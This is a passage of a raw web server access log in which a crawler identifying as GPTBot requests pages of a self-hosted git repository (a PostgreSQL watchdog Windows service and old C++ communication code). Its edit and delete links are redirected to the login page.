AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1063] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1341] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:29:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:29:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:29:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13543] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15376] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15376] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12813] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15381] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15375] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20213] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:18:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" 